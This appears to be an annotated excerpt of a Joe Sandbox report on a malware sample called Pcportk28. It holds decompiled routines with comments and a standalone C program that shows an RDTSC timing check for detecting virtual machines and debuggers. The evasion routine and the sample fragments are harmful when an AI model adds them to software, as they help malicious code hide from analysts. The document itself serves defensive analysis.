                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 66%
                                                			E004088D0(intOrPtr* _a4) {
                                                				intOrPtr _v8;
                                                				char _v24;
                                                				char _v284;
                                                				char _v804;
                                                				char _v840;
                                                				void* __ebx;
                                                				void* _t24;
                                                				void* _t31;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t39;
                                                				void* _t50;
                                                				intOrPtr* _t52;
                                                				void* _t53;
                                                				void* _t54;
                                                				void* _t55;
                                                				void* _t56;
                                                
                                                				_t52 = _a4;
                                                				_t39 = 0; // executed
                                                				_t24 = E00406E20(_t52,  &_v24); // executed
                                                				_t54 = _t53 + 8;
                                                				if(_t24 != 0) {
                                                					E00407030( &_v24,  &_v840);
                                                					_t55 = _t54 + 8;
                                                 					do {
                                                 						// 0x104 == MAX_PATH: _v284 is a name/path buffer that is cleared
                                                 						// and refilled from _v804 on every pass of the outer loop.
                                                 						E0041A0F0( &_v284, 0x104);
                                                 						E0041A760( &_v284,  &_v804);
                                                 						_t56 = _t55 + 0x10;
                                                 						_t50 = 0x4f;
                                                 						// Compare the buffer against table entries 0x4f..0x62 (20 entries)
                                                 						// fetched through E00413D90; a nonzero result from E00413DF0 is a match.
                                                 						while(1) {
                                                 							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
                                                							_t56 = _t56 + 0x10;
                                                							if(_t31 != 0) {
                                                								break;
                                                							}
                                                							_t50 = _t50 + 1;
                                                							if(_t50 <= 0x62) {
                                                								continue;
                                                							} else {
                                                							}
                                                							goto L8;
                                                						}
                                                 					_t9 = _t52 + 0x14; // 0xffffe1a5
                                                 					// Match found: XOR a state word at +0x474 of the context structure and
                                                 					// set the found flag, which ends the outer do/while.
                                                 					 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                 					_t39 = 1;
                                                						L8:
                                                						_t33 = E00407060( &_v24,  &_v840);
                                                						_t55 = _t56 + 8;
                                                					} while (_t33 != 0 && _t39 == 0);
                                                					_push( &_v24);
                                                					_push(_t52); // executed
                                                					_t34 = E004070E0(_t39); // executed
                                                 					if(_t39 == 0) {
                                                 						// No match: two back-to-back RDTSC reads, the timing check the report
                                                 						// flags as "Tries to detect virtualization through RDTSC time measurements".
                                                 						// The decompiler does not recover the delta arithmetic (next line).
                                                 						asm("rdtsc");
                                                 						asm("rdtsc");
                                                 						_v8 = _t34 - 0 + _t34;
                                                 						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                					}
                                                 				// Update two adjacent fields at +0x31/+0x32 of the context structure before
                                                 				// returning (the decompiler's intOrPtr typing overlaps them).
                                                 				 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                 				_t20 = _t52 + 0x31; // 0x5608758b
                                                 				 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                					return 1;
                                                				} else {
                                                					return _t24;
                                                				}
                                                			}




















                                                0x004088db
                                                0x004088e3
                                                0x004088e5
                                                0x004088ea
                                                0x004088ef
                                                0x00408902
                                                0x00408907
                                                0x00408910
                                                0x0040891c
                                                0x0040892f
                                                0x00408934
                                                0x00408937
                                                0x00408940
                                                0x00408952
                                                0x00408957
                                                0x0040895c
                                                0x00000000
                                                0x00000000
                                                0x0040895e
                                                0x00408962
                                                0x00000000
                                                0x00000000
                                                0x00408964
                                                0x00000000
                                                0x00408962
                                                0x00408966
                                                0x00408969
                                                0x0040896f
                                                0x00408971
                                                0x0040897c
                                                0x00408981
                                                0x00408984
                                                0x0040898f
                                                0x00408990
                                                0x00408991
                                                0x0040899c
                                                0x0040899e
                                                0x004089a4
                                                0x004089a8
                                                0x004089ab
                                                0x004089ab
                                                0x004089b2
                                                0x004089b5
                                                0x004089ba
                                                0x004089c7
                                                0x004088f6
                                                0x004088f6
                                                0x004088f6

Memory Dump Source
• Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
Similarity
• Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
• Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
• Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7

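The two consecutive RDTSC reads in the listing above are the measurement behind the report's "Tries to detect virtualization through RDTSC time measurements" signature. The C program below is an added illustration of that technique; it is not code from the analysed sample or from the report. It takes the smallest gap between two adjacent RDTSC reads over a number of samples and compares it with a threshold. The sample count, the 1000-tick threshold and the decision rule are assumptions made for the illustration: the sample's own threshold and what it does with the result are not recovered by the decompiler. Build with GCC or Clang; on non-x86 hosts a monotonic-clock fallback stands in for RDTSC so the program still runs.

```c
/* Added illustration of an RDTSC timing check; not code from the analysed sample. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 199309L
#endif
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
/* Read the time-stamp counter, reassembling the EDX:EAX pair the instruction returns. */
static inline uint64_t read_tsc(void) {
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
}
#else
#include <time.h>
/* Assumption for non-x86 hosts only: monotonic-clock nanoseconds stand in for TSC ticks. */
static inline uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* Smallest gap between two back-to-back reads over `samples` attempts.
 * Taking the minimum discards readings inflated by an interrupt or a context
 * switch landing between the two instructions. On bare metal the minimum is a
 * few dozen cycles; under a hypervisor that traps RDTSC, or under a debugger
 * single-stepping the process, it is in the thousands.
 * Returns UINT64_MAX when samples == 0. */
uint64_t min_rdtsc_delta(unsigned samples) {
    uint64_t best = UINT64_MAX;
    for (unsigned i = 0; i < samples; i++) {
        uint64_t t0 = read_tsc();
        uint64_t t1 = read_tsc();
        /* If thread migration between unsynchronised TSCs makes t1 < t0, the unsigned
         * wrap produces a huge value that the minimum simply ignores. */
        uint64_t d = t1 - t0;
        if (d < best) {
            best = d;
        }
    }
    return best;
}

/* Decision rule (assumed threshold, not the sample's): 1 means the gap is too large
 * for an untrapped RDTSC and the process is probably being emulated or stepped. */
int looks_instrumented(uint64_t delta, uint64_t threshold_ticks) {
    return delta > threshold_ticks;
}

int main(void) {
    uint64_t d = min_rdtsc_delta(1000);
    printf("minimum delta between adjacent RDTSC reads: %llu ticks, instrumented=%d\n",
           (unsigned long long)d, looks_instrumented(d, 1000));
    return 0;
}
```

Run it once on bare metal and once inside a VM with RDTSC exiting enabled to see the two regimes the check separates; the `_v8 = _t34 - 0 + _t34` line in the dump is where the sample's equivalent of `t1 - t0` sits, with the decompiler's expression not reflecting the RDTSC results.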
Control-flow Graph
control_flow_graph 3 4188b0-4188e1 call 4191e0 RtlAllocateHeap
C-Code - Quality: 100%
E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
    void* _t10;
    void* _t15;

    // Wrapper pattern shared by the API stubs in this dump: _a4 is a context structure,
    // and E004191E0 is called with it, an offset into it and a per-stub constant
    // (0x34 here) immediately before the real API call. What E004191E0 does is not
    // resolved by the report.
    E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
    _t6 =  &_a8; // 0x413536
    _t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed; (HeapHandle, Flags, Size) passed straight through
    return _t10;
}

Listing address range: 0x004188c7 to 0x004188e1 (function entry 0x004188b0).

APIs
• RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
Similarity
• API ID: AllocateHeap
• String ID: 65A
• API String ID: 1279760036-2085483392
• Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
• Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
• Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0

Control-flow Graph
control_flow_graph 282 407253-40725b 283 4072b8-4072ca call 413e50 282->283 284 40725d-40725e 282->284 294 4072cc-4072da PostThreadMessageW 283->294 295 4072fe-407302 283->295 286 407260-40727d call 419b20 call 4199d0 284->286 287 40729c-40729f 284->287 289 4072a1-4072b3 call 409b40 287->289 290 4072db-4072de 287->290 289->283 296 4072e0-4072fa call 4092a0 290->296 297 4072fd 290->297 294->290 296->297 297->295
C-Code - Quality: 62%
E00407253(void* __ecx, void* __edx, void* __eflags) {
    // Note on this listing: it starts at 0x00407253, an offset inside the E00407280 routine
    // below that is not an instruction boundary. The opening les/loop sequence is a decoding
    // artefact, and from 0x0040729c on the listing runs through E00407280's own code (both
    // control-flow graphs share the blocks from 0x4072cc to 0x407302).
    int _t11;
    void* _t13;
    void* _t14;
    int _t20;
    long _t21;
    void* _t30;
    void* _t32;
    void* _t33;

    asm("les edi, [edx+0x463bc095]");
    _pop(_t21);
    asm("loop 0x5d");
    _t33 = _t32 + 1;
    if(__eflags >= 0) {
        _t20 = __edx +  *((intOrPtr*)(__ecx - 0x18));
        __eflags = _t20;
        if(__eflags >= 0) {
            L5:
            asm("salc"); // executed
            __eflags = _t11;
            if(__eflags == 0) {
                _push(_t11);
                _t11 = E004092A0(__eflags, 1, 8) & 0x000000ff;
                _push(_t30 + _t11 - 0x40);
                _push(0x8003);
                 *((intOrPtr*)(_t21 - 1)) =  *((intOrPtr*)(_t21 - 1)) + _t20;
                asm("salc");
            }
        } else {
             *_t11 =  *_t11 + _t11;
            _t20 = _t30 - 0x40;
            _t13 = E00409B40(__eflags,  *((intOrPtr*)(_t30 + 8)) + 0x1c, _t20); // executed
            _t11 = E00413E50( *((intOrPtr*)(_t30 + 8)) + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
            _t33 = _t33 + 0x30;
            __eflags = _t11;
            if(_t11 != 0) {
                _push(_t21);
                _t21 =  *(_t30 + 0xc);
                _t11 = PostThreadMessageW(_t21, 0x111, 0, 0); // 0x111 = WM_COMMAND, wParam = lParam = 0
                goto L5;
            }
        }
        return _t11;
    } else {
        _push(_t23);
        _t14 = E00419B20(_t11, __ecx, 0x11c6f95e);
        return E004199D0(__ecx) + _t14 + 0x1000;
    }
}

Listing address range: 0x00407253 to 0x00407302.

APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
Similarity
• API ID: MessagePostThread
• API String ID: 1836367815-0
• Opcode ID: 52408c0a9d3e33ca3b15a549146ed3cc27fcc96a1c1cffd4213f1bc2a9849977
• Instruction ID: e7f31090fd5cce6b4cbcb140759b42763e89decaf705f09c70cea09fb1590630
• Instruction Fuzzy Hash: DB014972E4022477DB20A5529C02FEF3318AB40B14F1500BEFE08BA1C2E6787D0682EA

Control-flow Graph
control_flow_graph 303 407280-4072ad call 41a140 call 41ad20 308 4072b3-4072ca call 413e50 303->308 309 4072ae call 409b40 303->309 313 4072cc-4072de PostThreadMessageW 308->313 314 4072fe-407302 308->314 309->308 316 4072e0-4072fa call 4092a0 313->316 317 4072fd 313->317 316->317 317->314
C-Code - Quality: 71%
E00407280(void* __edx, intOrPtr _a4, long _a8) {
    char _v67;
    char _v68;
    int _t13;
    void* _t15;
    void* _t16;
    void* _t19;
    char* _t20;
    long _t21;
    void* _t26;
    void* _t27;

    _t19 = __edx;
    _v68 = 0;
    // After _v68 = 0 this clears the remaining 0x3f bytes of the 0x40-byte local if
    // E0041A140 is a memset-style (ptr, value, length) routine; the report does not resolve it.
    _t13 = E0041A140( &_v67, 0, 0x3f);
    _push(3);
    _t20 = _t19 +  *((intOrPtr*)( &_v68 - 0x18));
    _t29 = _t20;
    if(_t20 >= 0) {
        L4:
        asm("salc"); // executed
        _t31 = _t13;
        if(_t13 != 0) {
            L7:
            return _t13;
        }
        _push(_t13);
        _t13 = E004092A0(_t31, 1, 8) & 0x000000ff;
        _push(_t26 + _t13 - 0x40);
        _push(0x8003);
         *((intOrPtr*)(_t21 - 1)) =  *((intOrPtr*)(_t21 - 1)) + _t20;
        asm("salc");
        goto L7;
    }
     *_t13 =  *_t13 + _t13;
    _t20 =  &_v68;
    _t15 = E00409B40(_t29, _a4 + 0x1c, _t20); // executed
    _t16 = E00413E50(_a4 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
    _t27 = _t27 + 0x30;
    if(_t16 != 0) {
        _push(_t21);
        _t21 = _a8;
        _t13 = PostThreadMessageW(_t21, 0x111, 0, 0); // 0x111 = WM_COMMAND posted to thread id _a8, wParam = lParam = 0
        goto L4;
    }
    return _t16;
}

Listing address range: 0x00407280 to 0x00407302.

APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
Similarity
• API ID: MessagePostThread
• API String ID: 1836367815-0
• Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
• Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
• Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA

Control-flow Graph
control_flow_graph 320 4189f6-4189ff 321 418a01-418a40 call 4191e0 320->321 322 418a56-418a6a call 4191e0 320->322 325 418a6f-418a84 LookupPrivilegeValueW 322->325
C-Code - Quality: 16%
E004189F6(signed int __ebx, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28) {
    // Note on this listing: it starts at 0x004189f6, an offset that is not an instruction
    // boundary. The sbb/aas prefix is a decoding artefact, and the control-flow graph falls
    // through to the same E004191E0 call and the same LookupPrivilegeValueW call at 0x00418a80
    // that E00418A50 (further below) makes.

    asm("sbb dl, al");
    asm("aas");
    if ((__ebx ^  *0x4c0fd0fb) < 0) goto L3;
}

Listing address range: 0x004189fc to 0x004189ff.

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
Similarity
• API ID: LookupPrivilegeValue
• API String ID: 3899507212-0
• Opcode ID: 921f58360fb0b5e683cb42f9298b62af2d9d37aed50ad0dbf8b0104d7f8d69d3
• Instruction ID: a01d6cd2099b129e91d480fc493c4c15b271880968f934ea6dd2ae2eca83370f
• Instruction Fuzzy Hash: 400169B5200209AFDB14DF99DC84EEB37ADEF88350F018159FA0CA7242CA34E954CBB4

Control-flow Graph
control_flow_graph 352 418a41-418a69 353 418a6f-418a84 LookupPrivilegeValueW 352->353 354 418a6a call 4191e0 352->354 354->353
C-Code - Quality: 53%
E00418A41(void* __eax, void* __ebx, void* __edx, void* __edi, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
    // Note on this listing: it starts at 0x00418a41, fifteen bytes before the E00418A50 entry,
    // at an offset that is not an instruction boundary. The aam/sbb prefix is a decoding
    // artefact; from 0x00418a6a on this is E00418A50's body.
    intOrPtr _v0;
    intOrPtr _t10;
    int _t13;

    asm("aam 0x71");
    _t22 = __edi -  *((intOrPtr*)(__edx - 0x7e));
    _push(__edi -  *((intOrPtr*)(__edx - 0x7e)));
    // The immediate is the byte sequence 55 8B EC 8B in memory, i.e. the push ebp / mov ebp, esp
    // prologue at 0x00418a50 swallowed by the misaligned decode.
    asm("sbb eax, 0x8bec8b55");
    _t10 = _v0;
    E004191E0(_t22, _t10, _t10 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
    _t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
    return _t13;
}

Listing address range: 0x00418a41 to 0x00418a84.

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
Similarity
• API ID: LookupPrivilegeValue
• API String ID: 3899507212-0
• Opcode ID: 366181999b52ce1b1f9812b49231122a7ac89ad237904e7c7f55fe723dd0b10f
• Instruction ID: 421726a2e665cf02d85752c26b7cbf2ca668620b504d320a260c99851f3fe134
• Instruction Fuzzy Hash: 19E0E5752041056FDB00DF6ADC85E977B69EF81250F00465EF88957106C534A445C7B4

Control-flow Graph
control_flow_graph 355 4188f0-418921 call 4191e0 RtlFreeHeap
C-Code - Quality: 79%
E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
    char _t10;
    void* _t15;

    // Decoding artefact: IN AL,DX (opcode EC) is privileged and cannot execute in user mode.
    // It is consistent with the EC byte of a mov ebp, esp prologue (8B EC) being decoded on its own.
    asm("in al, dx");
    _t7 = _a4;
    _t3 = _t7 + 0xc74; // 0xc74
    // Same pre-call stub as the allocation wrapper E004188B0, here with offset 0xc74 and constant 0x35.
    E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
    _t10 = RtlFreeHeap(_a8, _a12, _a16); // executed; (HeapHandle, Flags, BaseAddress) passed straight through
    return _t10;
}

Listing address range: 0x004188f2 to 0x00418921 (function entry 0x004188f0).

APIs
• RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
Similarity
• API ID: FreeHeap
• API String ID: 3298025750-0
• Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
• Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0

                                                C-Code - Quality: 100%
                                                			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				intOrPtr _t7;
                                                				int _t10;
                                                				void* _t15;
                                                
                                                				_t7 = _a4;
                                                				E004191E0(_t15, _t7, _t7 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                                                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}

                                                Instruction addresses: 0x00418a53, 0x00418a6a, 0x00418a80, 0x00418a84

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E004188F2() {
                                                				char _t10;
                                                				void* _t15;
                                                				void* _t19;
                                                
                                                				asm("in al, dx");
                                                				_t7 =  *((intOrPtr*)(_t19 + 8));
                                                				_t3 = _t7 + 0xc74; // 0xc74
                                                				E004191E0(_t15,  *((intOrPtr*)(_t19 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t19 + 8)) + 0x10)), 0, 0x35);
                                                				_t10 = RtlFreeHeap( *(_t19 + 0xc),  *(_t19 + 0x10),  *(_t19 + 0x14)); // executed
                                                				return _t10;
                                                			}

                                                Instruction addresses: 0x004188f2, 0x004188f3, 0x004188ff, 0x00418907, 0x0041891d, 0x00418921

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: 1003f38348de91aff8aad5e4e63cc2b9c0e10c34f63be8fed3bedb6f3b3b3e34
                                                • Instruction ID: 81d35264b95f37ae67e372158a4015b08c98f7621b2b45835833e9d944f4090c
                                                • Opcode Fuzzy Hash: 1003f38348de91aff8aad5e4e63cc2b9c0e10c34f63be8fed3bedb6f3b3b3e34
                                                • Instruction Fuzzy Hash: 3DE046B1200205BFDB18DF69CC48EE73768EF88350F018659F90C9B241C631E910CAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 33%
                                                			E00418924(intOrPtr _a4, int _a8) {
                                                				void* _t13;
                                                
                                                				asm("movsb");
                                                				0x8b978723();
                                                				_t8 = _a4;
                                                				E004191E0(_t13, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
                                                				ExitProcess(_a8);
                                                			}

                                                Instruction addresses: 0x00418929, 0x0041892d, 0x00418933, 0x0041894a, 0x00418958

                                                APIs
                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418958
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 5296c33d7f4fd38c0e184ded7b2dca68b0af8eb8d3a1445ecce078fbee8a850e
                                                • Instruction ID: f8961e69efa8a9b1a051e914a6d41aff56988d4c8773a7e1b39e283bf2ea7379
                                                • Opcode Fuzzy Hash: 5296c33d7f4fd38c0e184ded7b2dca68b0af8eb8d3a1445ecce078fbee8a850e
                                                • Instruction Fuzzy Hash: E5E0CD302002017FD320DF69CC85FC73B649F583A0F418664B9699B2E2C531EA41C695
